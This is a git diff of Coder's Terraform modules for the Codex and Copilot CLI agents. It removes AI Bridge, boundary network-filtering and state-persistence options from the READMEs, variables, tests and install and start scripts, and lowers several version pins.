-By default, when `enable_boundary = true`, the module uses `coder boundary` subcommand (provided by Coder) without requiring any installation.
+- **Install**: The module installs Codex CLI and sets up the environment
+- **System Prompt**: If `codex_system_prompt` is set, writes the prompt to `AGENTS.md` in the `~/.codex/` directory
+- **Start**: Launches Codex CLI in the specified directory, wrapped by AgentAPI
+- **Configuration**: Sets `OPENAI_API_KEY` environment variable and passes `--model` flag to Codex CLI (if variables provided)
+- **Session Continuity**: When `continue = true` (default), the module automatically tracks task sessions in `~/.codex-module/.codex-task-session`. On workspace restart, it resumes the existing session with full conversation history. Set `continue = false` to always start fresh sessions.

-```tf
-module "codex" {
-  source          = "registry.coder.com/coder-labs/codex/coder"
-  version         = "4.3.1"
-  agent_id        = coder_agent.main.id
-  openai_api_key  = var.openai_api_key
-  workdir         = "/home/coder/project"
-  enable_boundary = true
-}
+## Configuration
+
+### Default Configuration
+
+When no custom `base_config_toml` is provided, the module uses these secure defaults:
+
+```toml
+sandbox_mode = "workspace-write"
+approval_policy = "never"
+preferred_auth_method = "apikey"
+
+[sandbox_workspace_write]
+network_access = true
 ```

-> [!NOTE]
-> For developers: The module also supports installing boundary from a release version (`use_boundary_directly = true`) or compiling from source (`compile_boundary_from_source = true`). These are escape hatches for development and testing purposes.
+### Custom Configuration

-### Advanced Configuration
-
-This example shows additional configuration options for custom models, MCP servers, and base configuration.
+For custom Codex configuration, use `base_config_toml` and/or `additional_mcp_servers`:

 ```tf
 module "codex" {
-  source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.3.1"
-  agent_id       = coder_agent.example.id
-  openai_api_key = "..."
-  workdir        = "/home/coder/project"
-
-  codex_version = "0.1.0"  # Pin to a specific version
-  codex_model   = "gpt-4o" # Custom model
+  source  = "registry.coder.com/coder-labs/codex/coder"
+  version = "4.0.0"
+  # ... other variables ...

  # Override default configuration
  base_config_toml = <<-EOT
@@ -152,45 +119,6 @@ module "codex" {
 }
 ```

-> [!WARNING]
-> This module configures Codex with a `workspace-write` sandbox that allows AI tasks to read/write files in the specified workdir. While the sandbox provides security boundaries, Codex can still modify files within the workspace. Use this module _only_ in trusted environments and be aware of the security implications.
-
-## How it Works
-
- **Install**: The module installs Codex CLI and sets up the environment
- **System Prompt**: If `codex_system_prompt` is set, writes the prompt to `AGENTS.md` in the `~/.codex/` directory
- **Start**: Launches Codex CLI in the specified directory, wrapped by AgentAPI
- **Configuration**: Sets `OPENAI_API_KEY` environment variable and passes `--model` flag to Codex CLI (if variables provided)
- **Session Continuity**: When `continue = true` (default), the module automatically tracks task sessions in `~/.codex-module/.codex-task-session`. On workspace restart, it resumes the existing session with full conversation history. Set `continue = false` to always start fresh sessions.
-
-## State Persistence
-
-AgentAPI can save and restore its conversation state to disk across workspace restarts. This complements `continue` (which resumes the Codex CLI session) by also preserving the AgentAPI-level context. Enabled by default, requires agentapi >= v0.12.0 (older versions skip it with a warning).
-
-To disable:
-
-```tf
-module "codex" {
-  # ... other config
-  enable_state_persistence = false
-}
-```
-
-## Configuration
-
-### Default Configuration
-
-When no custom `base_config_toml` is provided, the module uses these secure defaults:
-
-```toml
-sandbox_mode = "workspace-write"
-approval_policy = "never"
-preferred_auth_method = "apikey"
-
-[sandbox_workspace_write]
-network_access = true
-```
-
 > [!NOTE]
 > If no custom configuration is provided, the module uses secure defaults. The Coder MCP server is always included automatically. For containerized workspaces (Docker/Kubernetes), you may need `sandbox_mode = "danger-full-access"` to avoid permission issues. For advanced options, see [Codex config docs](https://github.com/openai/codex/blob/main/codex-rs/config.md).

@@ -209,4 +137,3 @@ network_access = true
 - [Codex CLI Documentation](https://github.com/openai/codex)
 - [AgentAPI Documentation](https://github.com/coder/agentapi)
 - [Coder AI Agents Guide](https://coder.com/docs/tutorials/ai-agents)
- [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge)
@@ -113,7 +113,7 @@ describe("codex", async () => {
      sandbox_mode = "danger-full-access"
      approval_policy = "never"
      preferred_auth_method = "apikey"
-
+      
      [custom_section]
      new_feature = true
    `.trim();
@@ -189,7 +189,7 @@ describe("codex", async () => {
      args = ["-y", "@modelcontextprotocol/server-github"]
      type = "stdio"
      description = "GitHub integration"
-
+      
      [mcp_servers.FileSystem]
      command = "npx"
      args = ["-y", "@modelcontextprotocol/server-filesystem", "/workspace"]
@@ -215,7 +215,7 @@ describe("codex", async () => {
      approval_policy = "untrusted"
      preferred_auth_method = "chatgpt"
      custom_setting = "test-value"
-
+      
      [advanced_settings]
      timeout = 30000
      debug = true
@@ -228,7 +228,7 @@ describe("codex", async () => {
      args = ["--serve", "--port", "8080"]
      type = "stdio"
      description = "Custom development tool"
-
+      
      [mcp_servers.DatabaseMCP]
      command = "python"
      args = ["-m", "database_mcp_server"]
@@ -454,63 +454,4 @@ describe("codex", async () => {
    );
    expect(startLog.stdout).not.toContain("test prompt");
  });
-
-  test("codex-with-aibridge", async () => {
-    const { id } = await setup({
-      moduleVariables: {
-        enable_aibridge: "true",
-        model_reasoning_effort: "none",
-      },
-    });
-
-    await execModuleScript(id);
-    const configToml = await readFileContainer(
-      id,
-      "/home/coder/.codex/config.toml",
-    );
-    expect(configToml).toContain('model_provider = "aibridge"');
-  });
-
-  test("boundary-enabled", async () => {
-    const { id } = await setup({
-      moduleVariables: {
-        enable_boundary: "true",
-        boundary_config_path: "/tmp/test-boundary.yaml",
-      },
-    });
-    // Write boundary config
-    await execContainer(id, [
-      "bash",
-      "-c",
-      `cat > /tmp/test-boundary.yaml <<'EOF'
-jail_type: landjail
-proxy_port: 8087
-log_level: warn
-allowlist:
-  - "domain=api.openai.com"
-EOF`,
-    ]);
-    // Add mock coder binary for boundary setup
-    await writeExecutable({
-      containerId: id,
-      filePath: "/usr/bin/coder",
-      content: `#!/bin/bash
-if [ "$1" = "boundary" ]; then
-  if [ "$2" = "--help" ]; then
-    echo "boundary help"
-    exit 0
-  fi
-  shift; shift; exec "$@"
-fi
-echo "mock coder"`,
-    });
-    await execModuleScript(id);
-    await expectAgentAPIStarted(id);
-    // Verify boundary wrapper was used in start script
-    const startLog = await readFileContainer(
-      id,
-      "/home/coder/.codex-module/agentapi-start.log",
-    );
-    expect(startLog).toContain("boundary");
-  });
 });
@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.9"
+  required_version = ">= 1.0"

  required_providers {
    coder = {
@@ -71,27 +71,6 @@ variable "cli_app_display_name" {
  default     = "Codex CLI"
 }

-variable "enable_aibridge" {
-  type        = bool
-  description = "Use AI Bridge for Codex. https://coder.com/docs/ai-coder/ai-bridge"
-  default     = false
-
-  validation {
-    condition     = !(var.enable_aibridge && length(var.openai_api_key) > 0)
-    error_message = "openai_api_key cannot be provided when enable_aibridge is true. AI Bridge automatically authenticates the client using Coder credentials."
-  }
-}
-
-variable "model_reasoning_effort" {
-  type        = string
-  description = "The reasoning effort for the model. One of: none, low, medium, high. https://platform.openai.com/docs/guides/latest-model#lower-reasoning-effort"
-  default     = ""
-  validation {
-    condition     = contains(["", "none", "minimal", "low", "medium", "high", "xhigh"], var.model_reasoning_effort)
-    error_message = "model_reasoning_effort must be one of: none, low, medium, high."
-  }
-}
-
 variable "install_codex" {
  type        = bool
  description = "Whether to install Codex."
@@ -131,13 +110,13 @@ variable "install_agentapi" {
 variable "agentapi_version" {
  type        = string
  description = "The version of AgentAPI to install."
-  default     = "v0.12.1"
+  default     = "v0.11.6"
 }

 variable "codex_model" {
  type        = string
-  description = "The model for Codex to use. Defaults to gpt-5.3-codex."
-  default     = "gpt-5.4"
+  description = "The model for Codex to use. Defaults to gpt-5.1-codex-max."
+  default     = ""
 }

 variable "pre_install_script" {
@@ -164,105 +143,47 @@ variable "continue" {
  default     = true
 }

-variable "enable_state_persistence" {
-  type        = bool
-  description = "Enable AgentAPI conversation state persistence across restarts."
-  default     = true
-}
-
 variable "codex_system_prompt" {
  type        = string
  description = "System instructions written to AGENTS.md in the ~/.codex directory"
  default     = "You are a helpful coding assistant. Start every response with `Codex says:`"
 }

-variable "enable_boundary" {
-  type        = bool
-  description = "Enable coder boundary for network filtering."
-  default     = false
-}
-
-variable "boundary_config_path" {
-  type        = string
-  description = "Path to boundary config.yaml inside the workspace. If provided, exposed as BOUNDARY_CONFIG env var."
-  default     = ""
-}
-
-variable "boundary_version" {
-  type        = string
-  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release."
-  default     = "latest"
-}
-
-variable "compile_boundary_from_source" {
-  type        = bool
-  description = "Whether to compile boundary from source instead of using the official install script."
-  default     = false
-}
-
-variable "use_boundary_directly" {
-  type        = bool
-  description = "Whether to use boundary binary directly instead of coder boundary subcommand."
-  default     = false
-}
-
 resource "coder_env" "openai_api_key" {
  agent_id = var.agent_id
  name     = "OPENAI_API_KEY"
  value    = var.openai_api_key
 }

-resource "coder_env" "coder_aibridge_session_token" {
-  count    = var.enable_aibridge ? 1 : 0
-  agent_id = var.agent_id
-  name     = "CODER_AIBRIDGE_SESSION_TOKEN"
-  value    = data.coder_workspace_owner.me.session_token
-}
-
 locals {
-  workdir            = trimsuffix(var.workdir, "/")
-  app_slug           = "codex"
-  install_script     = file("${path.module}/scripts/install.sh")
-  start_script       = file("${path.module}/scripts/start.sh")
-  module_dir_name    = ".codex-module"
-  latest_codex_model = "gpt-5.4"
-  aibridge_config    = <<-EOF
-  [model_providers.aibridge]
-  name = "AI Bridge"
-  base_url = "${data.coder_workspace.me.access_url}/api/v2/aibridge/openai/v1"
-  env_key = "CODER_AIBRIDGE_SESSION_TOKEN"
-  wire_api = "responses"
-
-  EOF
+  workdir         = trimsuffix(var.workdir, "/")
+  app_slug        = "codex"
+  install_script  = file("${path.module}/scripts/install.sh")
+  start_script    = file("${path.module}/scripts/start.sh")
+  module_dir_name = ".codex-module"
 }

 module "agentapi" {
  source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.3.0"
+  version = "2.0.0"

-  agent_id                     = var.agent_id
-  folder                       = local.workdir
-  web_app_slug                 = local.app_slug
-  web_app_order                = var.order
-  web_app_group                = var.group
-  web_app_icon                 = var.icon
-  web_app_display_name         = var.web_app_display_name
-  cli_app                      = var.cli_app
-  cli_app_slug                 = var.cli_app ? "${local.app_slug}-cli" : null
-  cli_app_display_name         = var.cli_app ? var.cli_app_display_name : null
-  module_dir_name              = local.module_dir_name
-  install_agentapi             = var.install_agentapi
-  agentapi_subdomain           = var.subdomain
-  agentapi_version             = var.agentapi_version
-  enable_state_persistence     = var.enable_state_persistence
-  pre_install_script           = var.pre_install_script
-  post_install_script          = var.post_install_script
-  enable_boundary              = var.enable_boundary
-  boundary_config_path         = var.boundary_config_path
-  boundary_version             = var.boundary_version
-  compile_boundary_from_source = var.compile_boundary_from_source
-  use_boundary_directly        = var.use_boundary_directly
-  start_script                 = <<-EOT
+  agent_id             = var.agent_id
+  folder               = local.workdir
+  web_app_slug         = local.app_slug
+  web_app_order        = var.order
+  web_app_group        = var.group
+  web_app_icon         = var.icon
+  web_app_display_name = var.web_app_display_name
+  cli_app              = var.cli_app
+  cli_app_slug         = var.cli_app ? "${local.app_slug}-cli" : null
+  cli_app_display_name = var.cli_app ? var.cli_app_display_name : null
+  module_dir_name      = local.module_dir_name
+  install_agentapi     = var.install_agentapi
+  agentapi_subdomain   = var.subdomain
+  agentapi_version     = var.agentapi_version
+  pre_install_script   = var.pre_install_script
+  post_install_script  = var.post_install_script
+  start_script         = <<-EOT
     #!/bin/bash
     set -o errexit
     set -o pipefail
@@ -275,7 +196,6 @@ module "agentapi" {
     ARG_CODEX_START_DIRECTORY='${local.workdir}' \
     ARG_CODEX_TASK_PROMPT='${base64encode(var.ai_prompt)}' \
     ARG_CONTINUE='${var.continue}' \
-     ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
     /tmp/start.sh
   EOT

@@ -288,17 +208,12 @@ module "agentapi" {
    chmod +x /tmp/install.sh
    ARG_OPENAI_API_KEY='${var.openai_api_key}' \
    ARG_REPORT_TASKS='${var.report_tasks}' \
-    ARG_CODEX_MODEL='${var.codex_model}' \
-    ARG_LATEST_CODEX_MODEL='${local.latest_codex_model}' \
    ARG_INSTALL='${var.install_codex}' \
    ARG_CODEX_VERSION='${var.codex_version}' \
    ARG_BASE_CONFIG_TOML='${base64encode(var.base_config_toml)}' \
-    ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
-    ARG_AIBRIDGE_CONFIG='${base64encode(var.enable_aibridge ? local.aibridge_config : "")}' \
    ARG_ADDITIONAL_MCP_SERVERS='${base64encode(var.additional_mcp_servers)}' \
    ARG_CODER_MCP_APP_STATUS_SLUG='${local.app_slug}' \
    ARG_CODEX_START_DIRECTORY='${local.workdir}' \
-    ARG_MODEL_REASONING_EFFORT='${var.model_reasoning_effort}' \
    ARG_CODEX_INSTRUCTION_PROMPT='${base64encode(var.codex_system_prompt)}' \
    /tmp/install.sh
  EOT
@@ -1,187 +0,0 @@
-run "test_codex_basic" {
-  command = plan
-
-  variables {
-    agent_id       = "test-agent"
-    workdir        = "/home/coder"
-    openai_api_key = "test-key"
-  }
-
-  assert {
-    condition     = var.agent_id == "test-agent"
-    error_message = "Agent ID should be set correctly"
-  }
-
-  assert {
-    condition     = var.workdir == "/home/coder"
-    error_message = "Workdir should be set correctly"
-  }
-
-  assert {
-    condition     = var.install_codex == true
-    error_message = "install_codex should default to true"
-  }
-
-  assert {
-    condition     = var.install_agentapi == true
-    error_message = "install_agentapi should default to true"
-  }
-
-  assert {
-    condition     = var.report_tasks == true
-    error_message = "report_tasks should default to true"
-  }
-
-  assert {
-    condition     = var.continue == true
-    error_message = "continue should default to true"
-  }
-}
-
-run "test_enable_state_persistence_default" {
-  command = plan
-
-  variables {
-    agent_id       = "test-agent"
-    workdir        = "/home/coder"
-    openai_api_key = "test-key"
-  }
-
-  assert {
-    condition     = var.enable_state_persistence == true
-    error_message = "enable_state_persistence should default to true"
-  }
-}
-
-run "test_disable_state_persistence" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent"
-    workdir                  = "/home/coder"
-    openai_api_key           = "test-key"
-    enable_state_persistence = false
-  }
-
-  assert {
-    condition     = var.enable_state_persistence == false
-    error_message = "enable_state_persistence should be false when explicitly disabled"
-  }
-}
-
-run "test_codex_with_aibridge" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent"
-    workdir         = "/home/coder"
-    enable_aibridge = true
-  }
-
-  assert {
-    condition     = var.enable_aibridge == true
-    error_message = "enable_aibridge should be set to true"
-  }
-}
-
-run "test_aibridge_disabled_with_api_key" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent"
-    workdir         = "/home/coder"
-    openai_api_key  = "test-key"
-    enable_aibridge = false
-  }
-
-  assert {
-    condition     = var.enable_aibridge == false
-    error_message = "enable_aibridge should be false"
-  }
-
-  assert {
-    condition     = coder_env.openai_api_key.value == "test-key"
-    error_message = "OpenAI API key should be set correctly"
-  }
-}
-
-run "test_custom_options" {
-  command = plan
-
-  variables {
-    agent_id             = "test-agent"
-    workdir              = "/home/coder/project"
-    openai_api_key       = "test-key"
-    order                = 5
-    group                = "ai-tools"
-    icon                 = "/icon/custom.svg"
-    web_app_display_name = "Custom Codex"
-    cli_app              = true
-    cli_app_display_name = "Codex Terminal"
-    subdomain            = true
-    report_tasks         = false
-    continue             = false
-    codex_model          = "gpt-4o"
-    codex_version        = "0.1.0"
-    agentapi_version     = "v0.12.0"
-  }
-
-  assert {
-    condition     = var.order == 5
-    error_message = "Order should be set to 5"
-  }
-
-  assert {
-    condition     = var.group == "ai-tools"
-    error_message = "Group should be set to 'ai-tools'"
-  }
-
-  assert {
-    condition     = var.icon == "/icon/custom.svg"
-    error_message = "Icon should be set to custom icon"
-  }
-
-  assert {
-    condition     = var.cli_app == true
-    error_message = "cli_app should be enabled"
-  }
-
-  assert {
-    condition     = var.subdomain == true
-    error_message = "subdomain should be enabled"
-  }
-
-  assert {
-    condition     = var.report_tasks == false
-    error_message = "report_tasks should be disabled"
-  }
-
-  assert {
-    condition     = var.continue == false
-    error_message = "continue should be disabled"
-  }
-
-  assert {
-    condition     = var.codex_model == "gpt-4o"
-    error_message = "codex_model should be set to 'gpt-4o'"
-  }
-}
-
-run "test_no_api_key_no_aibridge" {
-  command = plan
-
-  variables {
-    agent_id = "test-agent"
-    workdir  = "/home/coder"
-  }
-
-  assert {
-    condition     = var.openai_api_key == ""
-    error_message = "openai_api_key should be empty when not provided"
-  }
-
-  assert {
-    condition     = var.enable_aibridge == false
-    error_message = "enable_aibridge should default to false"
-  }
-}
@@ -13,22 +13,17 @@ set -o nounset
 ARG_BASE_CONFIG_TOML=$(echo -n "$ARG_BASE_CONFIG_TOML" | base64 -d)
 ARG_ADDITIONAL_MCP_SERVERS=$(echo -n "$ARG_ADDITIONAL_MCP_SERVERS" | base64 -d)
 ARG_CODEX_INSTRUCTION_PROMPT=$(echo -n "$ARG_CODEX_INSTRUCTION_PROMPT" | base64 -d)
-ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
-ARG_AIBRIDGE_CONFIG=$(echo -n "$ARG_AIBRIDGE_CONFIG" | base64 -d)

 echo "=== Codex Module Configuration ==="
 printf "Install Codex: %s\n" "$ARG_INSTALL"
 printf "Codex Version: %s\n" "$ARG_CODEX_VERSION"
 printf "App Slug: %s\n" "$ARG_CODER_MCP_APP_STATUS_SLUG"
-printf "Codex Model: %s\n" "${ARG_CODEX_MODEL:-"Default"}"
-printf "Latest Codex Model: %s\n" "${ARG_LATEST_CODEX_MODEL}"
 printf "Start Directory: %s\n" "$ARG_CODEX_START_DIRECTORY"
 printf "Has Base Config: %s\n" "$([ -n "$ARG_BASE_CONFIG_TOML" ] && echo "Yes" || echo "No")"
 printf "Has Additional MCP: %s\n" "$([ -n "$ARG_ADDITIONAL_MCP_SERVERS" ] && echo "Yes" || echo "No")"
 printf "Has System Prompt: %s\n" "$([ -n "$ARG_CODEX_INSTRUCTION_PROMPT" ] && echo "Yes" || echo "No")"
 printf "OpenAI API Key: %s\n" "$([ -n "$ARG_OPENAI_API_KEY" ] && echo "Provided" || echo "Not provided")"
 printf "Report Tasks: %s\n" "$ARG_REPORT_TASKS"
-printf "Enable Coder AI Bridge: %s\n" "$ARG_ENABLE_AIBRIDGE"
 echo "======================================"

 set +o nounset
@@ -92,33 +87,15 @@ function install_codex() {

 write_minimal_default_config() {
  local config_path="$1"
-
-  ARG_OPTIONAL_TOP_LEVEL_CONFIG=""
-
-  if [[ "${ARG_ENABLE_AIBRIDGE}" = "true" ]]; then
-    ARG_OPTIONAL_TOP_LEVEL_CONFIG='model_provider = "aibridge"'
-  fi
-
-  if [[ "${ARG_MODEL_REASONING_EFFORT}" != "" ]]; then
-    ARG_OPTIONAL_TOP_LEVEL_CONFIG+=$'\n'"model_reasoning_effort = \"${ARG_MODEL_REASONING_EFFORT}\""
-  fi
-
  cat << EOF > "$config_path"
 # Minimal Default Codex Configuration
 sandbox_mode = "workspace-write"
 approval_policy = "never"
 preferred_auth_method = "apikey"
-${ARG_OPTIONAL_TOP_LEVEL_CONFIG}

 [sandbox_workspace_write]
 network_access = true

-[notice.model_migrations]
-"${ARG_CODEX_MODEL}" = "${ARG_LATEST_CODEX_MODEL}"
-
-[projects."${ARG_CODEX_START_DIRECTORY}"]
-trust_level = "trusted"
-
 EOF
 }

@@ -150,15 +127,6 @@ EOF
  fi
 }

-append_aibridge_config_section() {
-  local config_path="$1"
-
-  if [ -n "$ARG_AIBRIDGE_CONFIG" ]; then
-    printf "Adding AI Bridge configuration\n"
-    echo -e "\n# AI Bridge Configuration\n$ARG_AIBRIDGE_CONFIG" >> "$config_path"
-  fi
-}
-
 function populate_config_toml() {
  CONFIG_PATH="$HOME/.codex/config.toml"
  mkdir -p "$(dirname "$CONFIG_PATH")"
@@ -172,11 +140,6 @@ function populate_config_toml() {
  fi

  append_mcp_servers_section "$CONFIG_PATH"
-
-  if [ "$ARG_ENABLE_AIBRIDGE" = "true" ]; then
-    printf "AI Bridge is enabled\n"
-    append_aibridge_config_section "$CONFIG_PATH"
-  fi
 }

 function add_instruction_prompt_if_exists() {
@@ -222,7 +185,4 @@ install_codex
 codex --version
 populate_config_toml
 add_instruction_prompt_if_exists
-
-if [ "$ARG_ENABLE_AIBRIDGE" = "false" ]; then
-  add_auth_json
-fi
+add_auth_json
@@ -18,7 +18,6 @@ printf "Version: %s\n" "$(codex --version)"
 set -o nounset
 ARG_CODEX_TASK_PROMPT=$(echo -n "$ARG_CODEX_TASK_PROMPT" | base64 -d)
 ARG_CONTINUE=${ARG_CONTINUE:-true}
-ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}

 echo "=== Codex Launch Configuration ==="
 printf "OpenAI API Key: %s\n" "$([ -n "$ARG_OPENAI_API_KEY" ] && echo "Provided" || echo "Not provided")"
@@ -27,7 +26,6 @@ printf "Start Directory: %s\n" "$ARG_CODEX_START_DIRECTORY"
 printf "Has Task Prompt: %s\n" "$([ -n "$ARG_CODEX_TASK_PROMPT" ] && echo "Yes" || echo "No")"
 printf "Report Tasks: %s\n" "$ARG_REPORT_TASKS"
 printf "Continue Sessions: %s\n" "$ARG_CONTINUE"
-printf "Enable Coder AI Bridge: %s\n" "$ARG_ENABLE_AIBRIDGE"
 echo "======================================"
 set +o nounset

@@ -155,8 +153,8 @@ setup_workdir() {
 build_codex_args() {
  CODEX_ARGS=()

-  if [[ -n "${ARG_CODEX_MODEL}" ]]; then
-    CODEX_ARGS+=("--model" "${ARG_CODEX_MODEL}")
+  if [ -n "$ARG_CODEX_MODEL" ]; then
+    CODEX_ARGS+=("--model" "$ARG_CODEX_MODEL")
  fi

  if [ "$ARG_CONTINUE" = "true" ]; then
@@ -210,16 +208,7 @@ capture_session_id() {

 start_codex() {
  printf "Starting Codex with arguments: %s\n" "${CODEX_ARGS[*]}"
-  # AGENTAPI_BOUNDARY_PREFIX is set by the agentapi module's main.sh when
-  # enable_boundary=true. It points to a wrapper script that runs the command
-  # through coder boundary, sandboxing only the agent process.
-  if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
-    printf "Starting with coder boundary enabled\n"
-    agentapi server --type codex --term-width 67 --term-height 1190 -- \
-      "${AGENTAPI_BOUNDARY_PREFIX}" codex "${CODEX_ARGS[@]}" &
-  else
-    agentapi server --type codex --term-width 67 --term-height 1190 -- codex "${CODEX_ARGS[@]}" &
-  fi
+  agentapi server --term-width 67 --term-height 1190 -- codex "${CODEX_ARGS[@]}" &
  capture_session_id
 }

@@ -3,7 +3,7 @@ display_name: Copilot CLI
 description: GitHub Copilot CLI agent for AI-powered terminal assistance
 icon: ../../../../.icons/github.svg
 verified: false
-tags: [agent, copilot, ai, github, tasks, aibridge]
+tags: [agent, copilot, ai, github, tasks]
 ---

 # Copilot
@@ -13,7 +13,7 @@ Run [GitHub Copilot CLI](https://docs.github.com/copilot/concepts/agents/about-c
 ```tf
 module "copilot" {
  source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.4.0"
+  version  = "0.3.0"
  agent_id = coder_agent.example.id
  workdir  = "/home/coder/projects"
 }
@@ -51,7 +51,7 @@ data "coder_parameter" "ai_prompt" {

 module "copilot" {
  source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.4.0"
+  version  = "0.3.0"
  agent_id = coder_agent.example.id
  workdir  = "/home/coder/projects"

@@ -71,7 +71,7 @@ Customize tool permissions, MCP servers, and Copilot settings:
 ```tf
 module "copilot" {
  source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.4.0"
+  version  = "0.3.0"
  agent_id = coder_agent.example.id
  workdir  = "/home/coder/projects"

@@ -142,7 +142,7 @@ variable "github_token" {

 module "copilot" {
  source       = "registry.coder.com/coder-labs/copilot/coder"
-  version      = "0.4.0"
+  version      = "0.3.0"
  agent_id     = coder_agent.example.id
  workdir      = "/home/coder/projects"
  github_token = var.github_token
@@ -156,7 +156,7 @@ Run Copilot as a command-line tool without task reporting or web interface. This
 ```tf
 module "copilot" {
  source       = "registry.coder.com/coder-labs/copilot/coder"
-  version      = "0.4.0"
+  version      = "0.3.0"
  agent_id     = coder_agent.example.id
  workdir      = "/home/coder"
  report_tasks = false
@@ -164,39 +164,6 @@ module "copilot" {
 }
 ```

-### Usage with AI Bridge Proxy
-
-[AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy) routes Copilot traffic through [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) for centralized LLM management and governance.
-The proxy environment variables are scoped to the Copilot process only and do not affect other workspace traffic.
-
-```tf
-module "aibridge-proxy" {
-  source    = "registry.coder.com/coder/aibridge-proxy/coder"
-  version   = "1.0.0"
-  agent_id  = coder_agent.main.id
-  proxy_url = "https://aiproxy.example.com"
-}
-
-module "copilot" {
-  source                   = "registry.coder.com/coder-labs/copilot/coder"
-  version                  = "0.4.0"
-  agent_id                 = coder_agent.main.id
-  workdir                  = "/home/coder/projects"
-  enable_aibridge_proxy    = true
-  aibridge_proxy_auth_url  = module.aibridge-proxy.proxy_auth_url
-  aibridge_proxy_cert_path = module.aibridge-proxy.cert_path
-}
-```
-
-> [!NOTE]
-> AI Bridge Proxy is a Premium Coder feature that requires [AI Governance Add-On](https://coder.com/docs/ai-coder/ai-governance).
-> See the [AI Bridge Proxy setup guide](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup) for details on configuring the proxy on your Coder deployment.
-> GitHub authentication is still required for Copilot as the proxy authenticates with AI Bridge using the Coder session token, but does not replace GitHub authentication.
-
-> [!IMPORTANT]
-> When using AI Bridge Proxy, enable [startup coordination](https://coder.com/docs/admin/templates/startup-coordination) by setting `CODER_AGENT_SOCKET_SERVER_ENABLED=true` in the workspace container environment.
-> This ensures the Copilot module waits for the `aibridge-proxy` module to complete before starting. Without it, the Copilot start script may fail if the AI Bridge Proxy setup has not completed in time.
-
 ## Authentication

 The module supports multiple authentication methods (in priority order):
@@ -234,116 +234,3 @@ run "app_slug_is_consistent" {
    error_message = "module_dir_name should be '.copilot-module'"
  }
 }
-
-run "aibridge_proxy_defaults" {
-  command = plan
-
-  variables {
-    agent_id = "test-agent"
-    workdir  = "/home/coder"
-  }
-
-  assert {
-    condition     = var.enable_aibridge_proxy == false
-    error_message = "enable_aibridge_proxy should default to false"
-  }
-
-  assert {
-    condition     = var.aibridge_proxy_auth_url == null
-    error_message = "aibridge_proxy_auth_url should default to null"
-  }
-
-  assert {
-    condition     = var.aibridge_proxy_cert_path == null
-    error_message = "aibridge_proxy_cert_path should default to null"
-  }
-}
-
-run "aibridge_proxy_enabled" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent-aibridge-proxy"
-    workdir                  = "/home/coder"
-    enable_aibridge_proxy    = true
-    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
-    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
-  }
-
-  assert {
-    condition     = var.enable_aibridge_proxy == true
-    error_message = "AI Bridge Proxy should be enabled"
-  }
-
-  assert {
-    condition     = var.aibridge_proxy_auth_url == "https://coder:mock-token@aiproxy.example.com"
-    error_message = "AI Bridge Proxy auth URL should match the input variable"
-  }
-
-  assert {
-    condition     = var.aibridge_proxy_cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
-    error_message = "AI Bridge Proxy cert path should match the input variable"
-  }
-}
-
-run "aibridge_proxy_validation_missing_proxy_auth_url" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent-validation"
-    workdir                  = "/home/coder"
-    enable_aibridge_proxy    = true
-    aibridge_proxy_auth_url  = ""
-    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
-  }
-
-  expect_failures = [
-    var.enable_aibridge_proxy,
-  ]
-}
-
-run "aibridge_proxy_validation_missing_cert_path" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent-validation"
-    workdir                  = "/home/coder"
-    enable_aibridge_proxy    = true
-    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
-    aibridge_proxy_cert_path = ""
-  }
-
-  expect_failures = [
-    var.enable_aibridge_proxy,
-  ]
-}
-
-run "aibridge_proxy_with_copilot_config" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent"
-    workdir                  = "/home/coder"
-    copilot_model            = "gpt-5"
-    github_token             = "ghp_test123"
-    allow_all_tools          = true
-    enable_aibridge_proxy    = true
-    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
-    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
-  }
-
-  assert {
-    condition     = var.enable_aibridge_proxy == true
-    error_message = "AI Bridge Proxy should be enabled"
-  }
-
-  assert {
-    condition     = length(resource.coder_env.github_token) == 1
-    error_message = "github_token environment variable should be set alongside proxy"
-  }
-
-  assert {
-    condition     = length(resource.coder_env.copilot_model) == 1
-    error_message = "copilot_model environment variable should be set alongside proxy"
-  }
-}
@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.9"
+  required_version = ">= 1.0"
  required_providers {
    coder = {
      source  = "coder/coder"
@@ -173,35 +173,6 @@ variable "post_install_script" {
  default     = null
 }

-variable "enable_aibridge_proxy" {
-  type        = bool
-  description = "Route Copilot traffic through AI Bridge Proxy. See https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy"
-  default     = false
-
-  validation {
-    condition     = !var.enable_aibridge_proxy || (var.aibridge_proxy_auth_url != null && length(var.aibridge_proxy_auth_url) > 0)
-    error_message = "aibridge_proxy_auth_url is required when enable_aibridge_proxy is true."
-  }
-
-  validation {
